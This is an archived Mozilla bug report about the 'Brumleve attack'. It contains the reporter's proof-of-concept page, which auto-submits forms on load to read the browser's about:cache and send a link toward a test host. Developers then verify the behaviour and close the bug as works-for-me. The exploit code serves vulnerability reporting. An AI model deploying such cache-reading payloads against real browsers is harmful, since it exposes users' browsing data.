Brumleve attack locks up Moz

VERIFIED WORKSFORME

Status

()

Core
Security
P3
normal
VERIFIED WORKSFORME
18 years ago
18 years ago

People

(Reporter: John Unruh, Assigned: Mitchell Stoltz (not reading bugmail))

Tracking

Trunk
All
Windows NT
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(URL)

(Reporter)

Description

18 years ago
1) Run the above URL. Code is below.
What happens: Windows - Moz locks up.
Linux - the user is asked to save a file getLink.js, but otherwise appears 
unaffected.
 
<title>Cache-Cow 4.07 (activated)</title>
  If the attack is successful, you will see a link from your cache 
  displayed in an alert. Otherwise you should get a JavaScript error 
  (you will need to open the javascript console to see it).
  <script>
  var slave;
  var data = "";

  function launch() {
    slave = window.open("javascript:void(0)", "slave");
    document.f.submit();
    document.g.submit(); 
  }

  function show() {
    document.g.urls.value = data;
    document.g.submit();
  }

  </script>
  <body onLoad="launch()">

  <base href="about:">

  <form action="cache" method="post" name=f target=slave>
  <input type=submit></form>
  <form action="http://junruh/jstests/getLink.js" name=g target=slave>
  <input type=submit></form>
  </body>

Comment 1

18 years ago
--> phil - working the same on NT as reported on Linux, could you try a recent 
build there and see what's happening. I don't know if being asked to save the 
file is not a security issue, and if it's not crashing we could move the bug to 
security instead.
Assignee: rogerl → pschwartau

Comment 2

18 years ago
Using Windows and Linux debug builds from 05/29/00 - 

In the Windows build, Moz does not lock up on the given URL. Instead, I get the 
prompt asking me to save the file getLink.js  - the behavior the reporter 
describes for Linux. 

On Linux, however, I do not get a prompt to save the file. I just get an empty 
child window of the parent window. The child window has no URL showing. In the 
debug window we see "Error loading URL http://junruh/jstests/cache". I am unable 
to bring up the JavaScript console at all when this happens.

I could close this bug, because Moz is not locking up on Windows as originally 
reported. However, could Security please review this? I don't understand 
Security issues enough to understand what the Brumleve attack is, and whether 
the behavior we are seeing now is acceptable. Thank you -  
Assignee: pschwartau → mstoltz
Component: Javascript Engine → Security: General
QA Contact: pschwartau → czhang
(Assignee)

Comment 3

18 years ago
I don't see any errant behavior or crash here, marking WORKSFORME.
Status: NEW → RESOLVED
Last Resolved: 18 years ago
Resolution: --- → WORKSFORME

Comment 4

18 years ago
I don't see unsecure thing either.
Status: RESOLVED → VERIFIED
You need to log in before you can comment on or make changes to this bug.